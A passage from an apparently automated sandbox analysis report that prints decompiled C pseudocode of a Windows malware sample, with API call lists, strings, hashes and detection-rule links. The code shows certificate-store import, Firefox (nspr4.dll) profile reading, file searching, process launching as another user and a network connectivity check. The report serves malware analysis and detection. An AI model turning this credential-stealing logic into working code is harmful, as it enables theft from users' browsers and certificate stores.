					GetSystemTime( &_v760);
					E0040CA33(0xaa,  &_v600);
					_t74 =  &_v744;
					E0040CA33(0xab, _t74);
					E004075B0( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E00411DF9( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E00410E2E(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E00411142(_t79 + 0x48 + E00411C55( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E00411F5D(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E00410E2E(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E00411F4B( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x00407781
0x00407787
0x0040778e
0x0040779a
0x004077a0
0x004077a6
0x004077e6
0x004077f8
0x004077fd
0x00407806
0x00407812
0x0040781c
0x00407822
0x00407828
0x0040782b
0x00407833
0x0040783b
0x0040783e
0x00407843
0x00407848
0x0040784d
0x00407865
0x0040786a
0x0040788d
0x00407898
0x004078a1
0x004078b3
0x004078b8
0x004078b8
0x004078a1
0x0040786a
0x0040784d
0x004078c7

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0040779A

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

GetSystemTime.KERNEL32(?), ref: 004077E6

Part of subcall function 004075B0: GetUserNameExW.SECUR32(00000002,?,?), ref: 004075C5

Strings

.txt, xrefs: 0040787C

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 105492e59ddcc8c5d41947ca3752e4bbce7497a51e5281ac0dc4d088c04b58c9
Instruction ID: 617042c2f6f740cedb6460626349e9e7d0e8b50c7c5dd30430e4d5c7ace60a11
Opcode Fuzzy Hash: 105492e59ddcc8c5d41947ca3752e4bbce7497a51e5281ac0dc4d088c04b58c9
Instruction Fuzzy Hash: 9A31B332604345ABDB20EF55CD45FAB77A8EF84304F00452ABA44A62D1D738E945C777

Uniqueness

Uniqueness Score: -1.00%

Function 00409849, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00403180,00000000,00004401,00403190,?,?,00000000), ref: 00409879
CoCreateInstance.OLE32(00403150,00000000,00004401,00403160,?,?,00000000), ref: 004098CC

Strings

D, xrefs: 004098F7

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: 2aeec06e679d536df223cf2f79cca6f86b34d9cb53889bfc670a7e268c055708
Instruction ID: e593250111069b92ae9cb7c70db1951e39ca8c7f6775df8587d49efb56acb42a
Opcode Fuzzy Hash: 2aeec06e679d536df223cf2f79cca6f86b34d9cb53889bfc670a7e268c055708
Instruction Fuzzy Hash: A8316FB2604305AFE710DF54CC85D6BB7ECAF88744F10452EF994A7291E734DD058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00418C01, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418C01(struct HINSTANCE__* __eax) {
				char _v8;
				char _v20;
				char _v108;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t11;
				void* _t18;
				signed int _t25;
				short* _t33;
				void* _t43;

				_t11 = __eax;
				_t33 = __eax;
				if( *0x41e7fc > 1) {
					_t11 = GetModuleHandleW(L"nspr4.dll");
					if(_t11 != 0) {
						if(_t33 == 0 ||  *_t33 == 0) {
							return E00418993(__eflags, 0);
						}
						_t11 = E004110EE(2 + E00411C55(_t33) * 4);
						_t31 = _t11;
						if(_t11 != 0) {
							_t25 = E00411F5D(E00412012(_t33, _t31) | 0xffffffff, _t31,  &_v20);
							_t11 = E00411106(_t31);
							if(_t25 != 0) {
								_t18 = 0x31;
								E0040C9FD(_t18,  &_v108);
								_t43 = E00411ECA( &_v8,  &_v108, _v20);
								_t11 = E00411F4B( &_v20);
								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
									E00418993(_t44, _v8);
									return E00411106(_v8);
								}
							}
						}
					}
				}
				return _t11;
			}

0x00418c01
0x00418c11
0x00418c13
0x00418c1e
0x00418c26
0x00418c2e
0x00000000
0x00418cb0
0x00418c44
0x00418c49
0x00418c4d
0x00418c66
0x00418c68
0x00418c6f
0x00418c76
0x00418c77
0x00418c8e
0x00418c93
0x00418c98
0x00418c9a
0x00418c9f
0x00000000
0x00418ca7
0x00418c9a
0x00418c6f
0x00418c4d
0x00418c26
0x00418cb9

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,77E49EB0,00000000), ref: 00418C1E

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

Part of subcall function 00418993: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 004189BA
Part of subcall function 00418993: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00418A0E
Part of subcall function 00418993: GetPrivateProfileIntW.KERNEL32 ref: 00418A71
Part of subcall function 00418993: GetPrivateProfileStringW.KERNEL32 ref: 00418A9D

Strings

d@, xrefs: 00418C82, 00418C9C, 00418C85
nspr4.dll, xrefs: 00418C19

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
String ID: nspr4.dll$d@
API String ID: 119068519-1452026018
Opcode ID: 20ac1bb5338b2b7268e84e8d31e5203c06fafa6946666a3ee6e8c21c10b9eb3c
Instruction ID: 2303ccad1aba290fcd0c21eef99642f97d050a6df1e30f088edfea582909824f
Opcode Fuzzy Hash: 20ac1bb5338b2b7268e84e8d31e5203c06fafa6946666a3ee6e8c21c10b9eb3c
Instruction Fuzzy Hash: 8811E331A0221466CB1177764D06BDEA6A95F90344F14052FBA11A32A1FF6C898591AD

Uniqueness

Uniqueness Score: -1.00%

Function 00415608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00415608(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E00411142( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00411142( &_v284, _a12, 0x102);
					E00412582( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 =  &M004046E8;
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E004114A7(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

0x00415618
0x0041561e
0x00415623
0x00415626
0x0041562d
0x00415631
0x00415633
0x00415635
0x00415639
0x0041563d
0x00415641
0x00415643
0x00415643
0x00415645
0x00415646
0x0041564f
0x00415660
0x00415671
0x00415671
0x0041567a
0x0041567d
0x0041567f
0x00415680
0x0041568e
0x00415693
0x00000000
0x00415682
0x00415683
0x00415685
0x0041568a
0x00415695
0x00415695
0x0041569a
0x0041569f
0x0041569f
0x00415683
0x00415680
0x004156a5
0x004156a9
0x004156b2

APIs

StringFromGUID2.OLE32(00000000,?,00000028,004069F7,?,00000010,00000000,77E49EB0), ref: 004156A9

Strings

Local\, xrefs: 0041568E
Global\, xrefs: 00415685

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: 29453d769c25f62165110c0e8fac43e791a76e75076e42e2c9010803fcb1340c
Instruction ID: 70d199f6801cb4304bbaad5819879d2adcae6ae0084c1896f1dc8b0c447dc8f5
Opcode Fuzzy Hash: 29453d769c25f62165110c0e8fac43e791a76e75076e42e2c9010803fcb1340c
Instruction Fuzzy Hash: 6A11E23264021DA6CB14DFB58C06BEF7769EB85704F40882BE246E6181DABC8585C798

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5A8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040B5A8(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E0040CA33(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E004111B9( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E004165E9( &_v572,  &_v16, _t37, 1, 2, E0040B30D,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00411106(_v12);
				}
				return E004095BC(_t29, _v12, 0xcb);
			}

0x0040b5b3
0x0040b5bb
0x0040b5c4
0x0040b5ce
0x0040b5d5
0x0040b5dc
0x0040b5e3
0x0040b5e8
0x0040b5ea
0x0040b5ea
0x0040b5f8
0x0040b5fe
0x0040b600
0x0040b612
0x0040b61b
0x0040b61b
0x0040b620
0x0040b621
0x0040b629
0x00000000
0x0040b642
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008,?,00000000), ref: 0040B5F8

Part of subcall function 004165E9: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
Part of subcall function 004165E9: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
Part of subcall function 004165E9: PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
Part of subcall function 004165E9: Sleep.KERNEL32(00000000,?,?), ref: 004166F6
Part of subcall function 004165E9: FindNextFileW.KERNEL32(?,?), ref: 00416724
Part of subcall function 004165E9: FindClose.KERNEL32(?), ref: 00416736

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

Strings

&, xrefs: 0040B5CE
#, xrefs: 0040B5DC

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: a0f1d527801865b438fc3755597731cac7b9170a07408ee9eae431d384b2bba4
Instruction ID: a9ead894ba9afed554aa2ce461dd0d36e112f055b3b1163deb0491a57a8ba65d
Opcode Fuzzy Hash: a0f1d527801865b438fc3755597731cac7b9170a07408ee9eae431d384b2bba4
Instruction Fuzzy Hash: EC11A371A01128BADB209B91DC09FDF7A7CEF41304F00406AB505B6180D7785B46CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEC9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040BEC9(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E0040CA33(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E004111B9( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E004165E9( &_v580,  &_v16, _t37, 1, 2, E0040BC3A,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00411106(_v12);
				}
				return E004095BC(_t29, _v12, 0xcb);
			}

0x0040bed4
0x0040bedc
0x0040bee5
0x0040beef
0x0040bef6
0x0040befd
0x0040bf04
0x0040bf09
0x0040bf0b
0x0040bf0b
0x0040bf19
0x0040bf1f
0x0040bf21
0x0040bf33
0x0040bf3c
0x0040bf3c
0x0040bf41
0x0040bf42
0x0040bf4a
0x00000000
0x0040bf63
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,00000003,00000000,00000008,?,00000000), ref: 0040BF19

Part of subcall function 004165E9: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
Part of subcall function 004165E9: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
Part of subcall function 004165E9: PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
Part of subcall function 004165E9: Sleep.KERNEL32(00000000,?,?), ref: 004166F6
Part of subcall function 004165E9: FindNextFileW.KERNEL32(?,?), ref: 00416724
Part of subcall function 004165E9: FindClose.KERNEL32(?), ref: 00416736

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

Strings

#, xrefs: 0040BEFD
&, xrefs: 0040BEEF

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 8eec85e84f672fb8cbcd655b8471676eb07b983db8c4076936cc61ba4711a21b
Instruction ID: aadd2444d570a0828405d74e42602f256bfa55a719a741fa1eff2a01cfabb311
Opcode Fuzzy Hash: 8eec85e84f672fb8cbcd655b8471676eb07b983db8c4076936cc61ba4711a21b
Instruction Fuzzy Hash: AE11A076A01128BADB209B92DC49BDFBE78EF45744F00406AB605B7190D3785A86CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00406FCD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00406FCD(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E0040CA33(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E0040C9FD(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E0040CA33(0xd5,  &_v92);
					_push(0x1e6);
					_push("0x5B8321CD");
					if(E00411E74( &_v8, _t32, 0x200099a) > 0) {
						 *_t28(0, _v8, "#", 0x10040);
						E00411106(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x00406fd4
0x00406fdc
0x00406fea
0x00406fee
0x00406ff5
0x00406ffd
0x0040700c
0x00407010
0x00407045
0x00407045
0x00407064
0x00000000
0x00407064
0x00407012
0x00407016
0x0040701e
0x00407023
0x00407028
0x00407043
0x00407058
0x0040705d
0x00407062
0x00000000
0x00407062
0x00000000
0x00407043
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 00406FE4
GetProcAddress.KERNEL32(00000000,?), ref: 00407006

Strings

0x5B8321CD, xrefs: 00407028

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0x5B8321CD
API String ID: 1646373207-92132254
Opcode ID: 0508da6be3c01fe22df0d1653f8c5c1631b7a33b5eae172ffc601901fbffc4e8
Instruction ID: d3cb757bb58486d5b1cfdb95b6470c9554b71bca8d26180f98683687bf149e7b
Opcode Fuzzy Hash: 0508da6be3c01fe22df0d1653f8c5c1631b7a33b5eae172ffc601901fbffc4e8
Instruction Fuzzy Hash: 2901D276E04355B7EB2067AA8C06BCF7B689F40710F000176FA01F72D1D97CAA0295A9

Uniqueness

Uniqueness Score: -1.00%

Function 00414BB4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414BB4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t17;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041621B( &_v524) != 0) {
					_t17 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E00411285(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
					E00411142(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x00414bc8
0x00414bde
0x00414bf8
0x00414bfe
0x00414c12
0x00414c1f
0x00414c26
0x00414c2a
0x00414c2b
0x00414c30

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00414BD6

Part of subcall function 0041621B: SetFileAttributesW.KERNEL32(00000080,00000080,00418BFB,?), ref: 00416224
Part of subcall function 0041621B: DeleteFileW.KERNEL32(?), ref: 0041622E

PathFindFileNameW.SHLWAPI(?,?,?), ref: 00414BF8

Part of subcall function 00411285: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00411F7D,00000000,00000000,00000000,004112E2,00000000,00000000,00000000,?,00000000), ref: 004112A0

Strings

cab, xrefs: 00414BCB

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
String ID: cab
API String ID: 2491076439-1787492089
Opcode ID: ce7f8fcd84bfd3ee5d14bd223d0f5135981f21d27ce70b6ddb05084b2f680cbb
Instruction ID: 3d9dd9b4d726a2925937594f3ab0dd0e8ef9208457da84a01e1c4499534990d6
Opcode Fuzzy Hash: ce7f8fcd84bfd3ee5d14bd223d0f5135981f21d27ce70b6ddb05084b2f680cbb
Instruction Fuzzy Hash: 6D01DB7260021467CB50ABB8DC0EFC7B7AC9F45754F0047657965F31D1E7B8D94486D4

Uniqueness

Uniqueness Score: -1.00%

Function 00404C8B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404C8B(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E004146CF(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E00411E74( &_a4, L"\"%s\"", _a16) > 0) {
								E00412A28(_t27, _a4);
								E00411106(_a4);
							}
						}
						E00411106(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x00404c95
0x00404c9a
0x00404ca5
0x00404ca9
0x00404cb8
0x00404cbe
0x00404cd4
0x00404cda
0x00404ce2
0x00404ce2
0x00404ce7
0x00404ce9
0x00404ce9
0x00000000
0x00404cf7
0x00404cf9

APIs

Part of subcall function 004146CF: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,0041273F,?,?,?,00406794,000000FF,0041E5A0), ref: 004146E8
Part of subcall function 004146CF: GetLastError.KERNEL32(?,?,0041273F,?,?,?,00406794,000000FF,0041E5A0,?,?,00000000), ref: 004146EE
Part of subcall function 004146CF: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0041273F,?,?,?,00406794,000000FF,0041E5A0), ref: 00414714

EqualSid.ADVAPI32(00000000,0000000C,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CB0

Part of subcall function 00412A28: LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00412A39
Part of subcall function 00412A28: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00412A58
Part of subcall function 00412A28: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00412A64
Part of subcall function 00412A28: CreateProcessAsUserW.ADVAPI32(?,00000000,00404CDF,00000000,00000000,00000000,00404CDF,00404CDF,00000000,?,?,?,00000000,00000044), ref: 00412AD5
Part of subcall function 00412A28: CloseHandle.KERNEL32(?), ref: 00412AE8
Part of subcall function 00412A28: CloseHandle.KERNEL32(?), ref: 00412AED
Part of subcall function 00412A28: FreeLibrary.KERNEL32(?), ref: 00412B04

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

CloseHandle.KERNEL32(?,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CF1

Strings

"%s", xrefs: 00404CC4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"
API String ID: 4035272744-3297466227
Opcode ID: 1ef3b37d8beab4da1141fc67d2ccdca75d2cb605036490efaf0c00bc02c4a111
Instruction ID: cf9fe193b0d28ddb65bb5a05327f71cb5d09876007578edd5e84f994a25b6d4d
Opcode Fuzzy Hash: 1ef3b37d8beab4da1141fc67d2ccdca75d2cb605036490efaf0c00bc02c4a111
Instruction Fuzzy Hash: D0F06D75100109BBDF127F62DD05EDE3B69EF84395B118036FE08A5171DB39CA60DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004131CF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004131CF(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t26;

				_v56 = 0x201;
				_v52 = 2;
				_v48 = __eax;
				_t18 = E0041314E();
				_t26 = 0;
				_v44 = _t18;
				_v40 = "http://www.internic.net/images/internic.gif";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E0041301C( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E00411106(_v44);
				return _t26;
			}

0x004131d8
0x004131de
0x004131e5
0x004131e8
0x004131f3
0x004131f5
0x004131f8
0x004131ff
0x00413202
0x00413205
0x00413208
0x0041320b
0x0041320e
0x00413215
0x0041321e
0x00413228
0x0041322e
0x0041322e
0x00413234
0x0041323f

APIs

Part of subcall function 0041314E: LoadLibraryA.KERNEL32(urlmon.dll,?), ref: 0041315F
Part of subcall function 0041314E: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413172
Part of subcall function 0041314E: FreeLibrary.KERNEL32(00000030), ref: 004131C4

GetTickCount.KERNEL32 ref: 00413218

Part of subcall function 0041301C: WaitForSingleObject.KERNEL32(?,?,?,00000000,?), ref: 00413070
Part of subcall function 0041301C: InternetCloseHandle.WININET(00000000), ref: 00413109

GetTickCount.KERNEL32 ref: 0041322A

Strings

http://www.internic.net/images/internic.gif, xrefs: 004131F8

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.internic.net/images/internic.gif
API String ID: 2673491915-804674498
Opcode ID: fa0d0d477034366977dc602024fa31134b5d98f682c958b342de780ba87912ae
Instruction ID: c2dd074b03a21ad8f51d46e4fa51465cc8a7e283ff1f4f8df0e2a3bb1848b2fc
Opcode Fuzzy Hash: fa0d0d477034366977dc602024fa31134b5d98f682c958b342de780ba87912ae
Instruction Fuzzy Hash: E701A8B1D11228AACF00EFE9D9455DEFBF8BF08758F10415BE900B7211D3B55A458BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041545F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041545F(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, char _a20) {
				char _v524;
				void* _t21;

				_t21 = 0;
				while(1) {
					_t3 =  &_a20; // 0x4056ed
					E0041532E( *_t3, 4, 0, _a4,  &_v524);
					if(E00416745( &_v524, _a12, _a8) != 0 && (_a16 == 0 || PathAddExtensionW(_a12, _a16) != 0) && GetFileAttributesW(_a12) == 0xffffffff) {
						break;
					}
					_t21 = _t21 + 1;
					if(_t21 < 0x64) {
						continue;
					}
					return 0;
				}
				return 1;
			}

0x00415469
0x0041546b
0x00415475
0x0041547a
0x00415492
0x00000000
0x00000000
0x004154b8
0x004154bc
0x00000000
0x00000000
0x00000000
0x004154be
0x00000000

APIs

Part of subcall function 0041532E: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041544F

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

PathAddExtensionW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 004154A0
GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 004154AD

Strings

V@, xrefs: 00415475

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$AttributesCharCombineExtensionFileUpper
String ID: V@
API String ID: 1608718705-2114727902
Opcode ID: fb7141be85fb6e57be85ca8ec5a88ce99e1d45592317557dcc89e3ca557a873a
Instruction ID: dde51da065c57adcb789e99021a9460111f29a9139ff284d100384937bc0ff37
Opcode Fuzzy Hash: fb7141be85fb6e57be85ca8ec5a88ce99e1d45592317557dcc89e3ca557a873a
Instruction Fuzzy Hash: A9F0AF35000A19DBDF115F20DC08BDB3B69AB41315F004266BC66A22B1C639C9E6DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC3A, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040BC3A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
